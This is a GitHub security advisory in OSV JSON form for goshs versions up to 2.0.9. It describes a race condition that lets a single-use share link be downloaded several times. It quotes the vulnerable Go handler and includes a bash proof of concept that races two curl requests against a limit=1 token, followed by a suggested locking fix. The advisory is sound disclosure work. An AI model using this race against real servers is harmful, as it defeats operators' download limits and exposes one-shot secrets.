{"id":"GHSA-j48m-h7xq-2xpj","summary":"goshs: Share-link ?token=… redemption races past download limit","details":"# Share-link `?token=…` redemption races past download limit\n\n**Ecosystem:** Go\n**Package:** `goshs.de/goshs/v2` (`github.com/patrickhener/goshs`)\n**Affected:** `\u003c= v2.0.9` (every release that shipped the share-link feature)\n\n## Summary\n\n`ShareHandler` reads the share token's `DownloadLimit` under `RLock`, releases the lock, serves the file, then re-acquires the lock to increment the counter. Concurrent requests all read the same `Downloaded`/`DownloadLimit` snapshot, all pass the check, and all are served — exceeding the operator's intended cap.\n\n## Details\n\n[`httpserver/handler.go:968-1018`](https://github.com/patrickhener/goshs/blob/v2.0.9/httpserver/handler.go#L968-L1018):\n\n```go\nfs.sharedLinksMu.RLock()\nentry, ok := fs.SharedLinks[token]\nfs.sharedLinksMu.RUnlock()                       // \u003c-- released here\n\nif entry.DownloadLimit \u003e 0 || entry.DownloadLimit == -1 {\n    // ...serve file...                          // \u003c-- whole transfer happens unlocked\n}\n\nfs.sharedLinksMu.Lock()                          // \u003c-- re-acquired only now\ncurrent.Downloaded++\nif current.Downloaded \u003e= current.DownloadLimit { delete(fs.SharedLinks, token) }\nfs.sharedLinksMu.Unlock()\n```\n\nBetween line 978 (`RUnlock`) and line 1008 (`Lock`), any number of goroutines can interleave and each observes the same pre-increment limit.\n\n## Proof of concept\n\n```bash\ngoshs -p 18000 -d /tmp/r -b admin:pw &\necho data \u003e /tmp/r/f.txt\n\n# operator issues a one-shot share\nSHARE=$(curl -su admin:pw \"http://localhost:18000/f.txt?share&limit=1\")\nTK=$(echo \"$SHARE\" | sed -n 's/.*token=\\([^\"]*\\)\".*/\\1/p')\n\n# attacker races two redemptions\ncurl -so /dev/null -w \"%{http_code}\\n\" \"http://localhost:18000/?token=$TK\" & \\\ncurl -so /dev/null -w \"%{http_code}\\n\" \"http://localhost:18000/?token=$TK\" & \\\nwait\n# observed: 200 / 200 (both succeed) -\u003e limit=1 redeemed twice\n```\n\nReproduced 5/5 times in a row on a 2026-era M-series Mac during verification.\n\n## Impact\n\nA \"single-use\" share intended to deliver a one-shot secret can be redeemed N times by N concurrent clients. Combined with any token-leak vector (mail forwarding, browser history, intercepted link, etc.) this multiplies the exfiltration window.\n\n## Suggested fix\n\nReserve under the write lock *before* serving — refund only if the serve fails:\n\n```go\nfs.sharedLinksMu.Lock()\nentry, ok := fs.SharedLinks[token]\nif !ok || time.Now().After(entry.Expires) ||\n   (entry.DownloadLimit != -1 && entry.Downloaded \u003e= entry.DownloadLimit) {\n    fs.sharedLinksMu.Unlock(); http.NotFound(w, r); return\n}\nentry.Downloaded++\nif entry.DownloadLimit != -1 && entry.Downloaded \u003e= entry.DownloadLimit {\n    delete(fs.SharedLinks, token)\n} else {\n    fs.SharedLinks[token] = entry\n}\nfs.sharedLinksMu.Unlock()\n// ...serve...\n```\n\nAdd a regression test that races two requests against a `limit=1` token and asserts exactly one `200`.\n\nReporter: Nishant Verma. Reproduced against `goshs v2.0.9` (commit `8fc1e91`) on 2026-05-27.","aliases":["CVE-2026-50139","GO-2026-5881"],"modified":"2026-07-07T16:11:23.385402720Z","published":"2026-07-01T21:59:08Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-07-01T21:59:08Z","nvd_published_at":null,"cwe_ids":["CWE-362"],"severity":"MODERATE"},"references":[{"type":"WEB","url":"https://github.com/patrickhener/goshs/security/advisories/GHSA-j48m-h7xq-2xpj"},{"type":"PACKAGE","url":"https://github.com/patrickhener/goshs"}],"affected":[{"package":{"name":"goshs.de/goshs/v2","ecosystem":"Go","purl":"pkg:golang/goshs.de/goshs/v2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"2.1.0"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 2.0.9","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-j48m-h7xq-2xpj/GHSA-j48m-h7xq-2xpj.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}]}